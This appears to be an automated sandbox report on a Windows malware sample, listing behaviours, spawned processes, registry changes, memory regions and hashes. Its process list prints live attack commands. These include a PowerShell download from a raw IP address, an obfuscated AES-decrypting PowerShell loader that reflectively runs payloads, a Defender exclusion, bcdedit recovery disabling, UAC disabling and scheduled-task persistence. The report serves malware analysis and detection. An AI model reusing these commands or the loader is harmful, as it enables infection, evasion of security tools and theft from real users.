| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\a\New.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Users\Admin\AppData\Local\Temp\a\New.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\a\New.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a\New.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\New.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-DOPSM.tmp\GTA_V.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\ld.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\New Text Document.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{18CZ3KYJ-176867-G8JF3R-G8JF3REQ8S}.exe | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{18CZ3KYJ-176867-G8JF3R-G8JF3REQ8S}.exe | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-DOPSM.tmp\GTA_V.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-DOPSM.tmp\GTA_V.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\7z.exe | N/A |
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Users\Admin\AppData\Local\Temp\a\New.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions | C:\Users\Admin\AppData\Local\Temp\a\New.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\a\New.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a\New.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{18CZ3KYJ-176867-G8JF3R-G8JF3REQ8S} = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.exe\" ..." | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\volumeinfo.exe'\"" | C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\a\New.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\a\New.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.com | N/A | N/A |
| N/A | iplogger.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4036 set thread context of 5632 | N/A | C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 5488 set thread context of 660 | N/A | C:\Users\Admin\AppData\Local\Temp\a\New.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe |
| PID 5544 set thread context of 5984 | N/A | C:\Users\Admin\AppData\Local\Temp\a\CapSimple.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 3340 set thread context of 3364 | N/A | C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe | C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe |
| PID 5488 set thread context of 5856 | N/A | C:\Users\Admin\AppData\Local\Temp\a\RambledMimets.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a\victor.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\ld.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\ld.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" | C:\Users\Admin\AppData\Local\Temp\a\ld.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\a\New.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\New Text Document.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"
C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe
"C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3404,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=3976 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe
"C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe
"C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe"
C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe
"C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C cd "C:\Users\Admin\AppData\Local\Temp\putty" & "Smartscreen.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://94.103.188.126/jerry/putty.zip', 'C:\Users\Admin\AppData\Local\Temp\putty.zip')"
C:\Users\Admin\AppData\Local\Temp\a\New.exe
"C:\Users\Admin\AppData\Local\Temp\a\New.exe"
C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe
"C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/26uSj6
C:\Windows\SysWOW64\tar.exe
tar -xf putty.zip
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=4804,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=4968 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4964,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=5208 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5448,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=5456 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --field-trial-handle=5760,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=5856 /prefetch:1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\New.exe" -Force
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6012,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=6028 /prefetch:8
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sxznnh.bat" "
C:\Windows\SysWOW64\cmd.exe
cmd /c "set __=^&rem"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vYb4bUA8Zv1kMxYvRP0sAIjxZQ1BITEGl+5o22oRccc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7mk7YscC2aINMd/eWv3Jag=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Xocfa=New-Object System.IO.MemoryStream(,$param_var); $bOZJm=New-Object System.IO.MemoryStream; $ufGxK=New-Object System.IO.Compression.GZipStream($Xocfa, [IO.Compression.CompressionMode]::Decompress); $ufGxK.CopyTo($bOZJm); $ufGxK.Dispose(); $Xocfa.Dispose(); $bOZJm.Dispose(); $bOZJm.ToArray();}function execute_function($param_var,$param2_var){ $yYjBH=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ftLJu=$yYjBH.EntryPoint; $ftLJu.Invoke($null, $param2_var);}$hWrPo = 'C:\Users\Admin\AppData\Local\Temp\sxznnh.bat';$host.UI.RawUI.WindowTitle = $hWrPo;$pJBjW=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($hWrPo).Split([Environment]::NewLine);foreach ($TrzXq in $pJBjW) { if ($TrzXq.StartsWith('qwvMZizsyLxauvnWQoBQ')) { $drGJM=$TrzXq.Substring(20); break; }}$payloads_var=[string[]]$drGJM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
C:\Users\Admin\AppData\Local\Temp\a\GTA_V.exe
"C:\Users\Admin\AppData\Local\Temp\a\GTA_V.exe"
C:\Users\Admin\AppData\Local\Temp\is-DOPSM.tmp\GTA_V.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DOPSM.tmp\GTA_V.tmp" /SL5="$202C8,18247052,1148416,C:\Users\Admin\AppData\Local\Temp\a\GTA_V.exe"
C:\Users\Admin\AppData\Local\Temp\a\CapSimple.exe
"C:\Users\Admin\AppData\Local\Temp\a\CapSimple.exe"
C:\Users\Admin\AppData\Local\Temp\a\RambledMimets.exe
"C:\Users\Admin\AppData\Local\Temp\a\RambledMimets.exe"
C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\7z.exe
"C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\7z.exe" x C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\libs.7z -pqwerty0987 -oC:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\a\ld.exe
"C:\Users\Admin\AppData\Local\Temp\a\ld.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe
"C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\a\MSiedge.exe
"C:\Users\Admin\AppData\Local\Temp\a\MSiedge.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
C:\Windows\system32\bcdedit.exe
bcdedit /set {current} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit /set {current} recoveryenabled no
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\sxznnh')
C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\7z.exe
"C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\7z.exe" x C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\IJUP069TW.7z -pqwerty0987 -oC:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\4A6CA328-7888-3279-B672-D1D9D0A46EE2
C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\7z.exe
"C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\7z.exe" x C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\KKUS33HVT.7z -pqwerty0987 -oC:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\4A6CA328-7888-3279-B672-D1D9D0A46EE2
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 HR" /sc HOURLY /rl HIGHEST
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 HR" /sc HOURLY /rl HIGHEST
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 LG" /sc ONLOGON /rl HIGHEST
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 LG" /sc ONLOGON /rl HIGHEST
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Users\Admin\AppData\Local\Temp\hqwokv.exe
"C:\Users\Admin\AppData\Local\Temp\hqwokv.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --field-trial-handle=1840,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=6100 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\a\victor.exe
"C:\Users\Admin\AppData\Local\Temp\a\victor.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 736 -ip 736
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 736 -s 232
C:\Users\Admin\AppData\Local\Temp\a\RambledMime.exe
"C:\Users\Admin\AppData\Local\Temp\a\RambledMime.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\a\current.exe
"C:\Users\Admin\AppData\Local\Temp\a\current.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\a\host_so.exe
"C:\Users\Admin\AppData\Local\Temp\a\host_so.exe"
C:\Users\Admin\AppData\Local\Temp\wegnhw.exe
"C:\Users\Admin\AppData\Local\Temp\wegnhw.exe"
C:\Users\Admin\AppData\Local\Temp\a\mixinte.exe
"C:\Users\Admin\AppData\Local\Temp\a\mixinte.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\a\inte.exe
"C:\Users\Admin\AppData\Local\Temp\a\inte.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\a\winlogon.exe
"C:\Users\Admin\AppData\Local\Temp\a\winlogon.exe"
Network
Files
memory/1332-0-0x0000000000BA0000-0x0000000000BA8000-memory.dmp
memory/1332-1-0x00007FFFE6243000-0x00007FFFE6245000-memory.dmp
memory/1332-2-0x00007FFFE6240000-0x00007FFFE6D01000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe
| MD5 | e817cc929fbc651c5bdab9e8cca0d9d9 |
| SHA1 | 4d73dc2afcde6a1dcf9417c0120252a2d8fd246f |
| SHA256 | 3a7327bd54ba0dfa36bbf0b9d0dc820984d6d0e0316cfa4045ab4c1e7e447282 |
| SHA512 | a9c1e547ef74c20e0a21dfc951463fb6883a23da4c323c96c5e64ac5793e774ceae898d4cf486e1bf1ea8fb69360610639a1046005fcdb9bd9f8463aec4a3e2f |
memory/3340-14-0x0000000074F4E000-0x0000000074F4F000-memory.dmp
memory/3340-15-0x0000000000560000-0x00000000007A0000-memory.dmp
memory/3340-16-0x0000000074F40000-0x00000000756F0000-memory.dmp
memory/3340-17-0x0000000005280000-0x000000000549C000-memory.dmp
memory/3340-18-0x00000000065D0000-0x00000000067EE000-memory.dmp
memory/3340-19-0x0000000006DC0000-0x0000000007364000-memory.dmp
memory/3340-20-0x0000000006910000-0x00000000069A2000-memory.dmp
memory/3340-21-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-32-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-34-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-48-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-63-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-64-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-76-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-74-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-72-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-70-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-68-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-66-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-60-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-58-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-54-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-50-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-56-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-52-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-46-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-44-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-40-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-38-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-37-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-42-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-30-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-28-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-26-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-24-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-22-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-78-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-84-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-82-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-81-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-4907-0x0000000074F40000-0x00000000756F0000-memory.dmp
memory/3340-4909-0x0000000006A90000-0x0000000006ADC000-memory.dmp
memory/3340-4908-0x0000000006A30000-0x0000000006A88000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe
| MD5 | b11913361b2d4c43c00c1969184050a8 |
| SHA1 | 8358fa3426e4136e0873a32f49f5f367770bad0a |
